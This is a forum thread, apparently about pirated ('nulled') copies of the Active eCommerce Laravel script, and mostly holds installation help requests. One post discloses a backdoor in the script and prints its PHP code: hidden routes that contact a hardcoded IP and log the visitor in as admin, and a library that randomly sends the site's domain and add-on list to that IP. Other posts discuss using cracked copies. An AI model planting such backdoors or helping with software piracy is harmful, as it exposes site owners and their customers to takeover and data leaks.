lostkid
Active member
- Mar 18, 2021
- 131
- 54
- 28
- 25
Simply remove or comment out the code in the files statedDamn , so is there any fix for this
Simply remove or comment out the code in the files statedDamn , so is there any fix for this
That will change the height of your search bar section are you sure you want that?thanks for help but i need to change logo it to 400 * 400 PX how to change it (( if change new image it resize to small image )) need big logo size
YesThat will change the height of your search bar section are you sure you want that?
I have one question. Is the code is untouched?Damn , so is there any fix for this
i have nulled but there is no such code piece in specified files.Found Major Backdoor In Active eCommerce @tuton012
The code allows them to login as admin by hitting a specific url when your using nulled.
app/Http/Controllers/Payment/StripeController.php
PHP:public function checkout_payment_detail() { $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_addon_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); dd($rn); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Http/Controllers/Payment/IyzicoController.php
PHP:public function initPayment(Request $request){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Utility/NgeniusUtility.php
PHP:public static function initPayment(){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } return redirect()->route('home'); }
The urls they use.
routes/web.php
PHP:Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit'); Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);
Randomly sends your server url to there licensing server.
vendor/laracon21/colorcodeconverter/src/Colorcodeconverter.php
PHP:if(rand(0,9) == 5){ $server_url = $_SERVER['SERVER_NAME']; $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url); curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET"); curl_setopt($url,CURLOPT_RETURNTRANSFER, true); curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata = curl_exec($url); curl_close($url); $header = array( 'Content-Type:application/json' ); $main_item = get_setting('item_name') ?? 'eCommerce'; $addon_list = Addon::get(); $request_data_json = json_encode($addon_list); $url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item); curl_setopt($url1, CURLOPT_HTTPHEADER, $header); curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($url1, CURLOPT_RETURNTRANSFER, true); curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json); curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata1 = curl_exec($url1); curl_close($url1); }
import it manual
Hi guys, when installing on localhost, the installation remains white screen in the Import SQL section.. does anyone know why?
version: 6.4.0 (05/12/2022)
- Added a new option for setting default Google map location
- Added Apple signin option
- Account delete option implemented for customers in the system
- Important bug fixing.
Please which version are you using?I am having issues with paystack gateway, after payment is done in checkout window, it sticks there
Already i am using namechip shared hosting. Its provide cpanelits happens sometimes when you use a local server so, use Cpanel server to fix that problem thanks!
no i get activation code when try installing on live server, meanwhile its working fine on localhost6.4.0 nulled?
please help i don't get itno i get activation code when try installing on live server, meanwhile its working fine on localhost
use code from nullmaster work@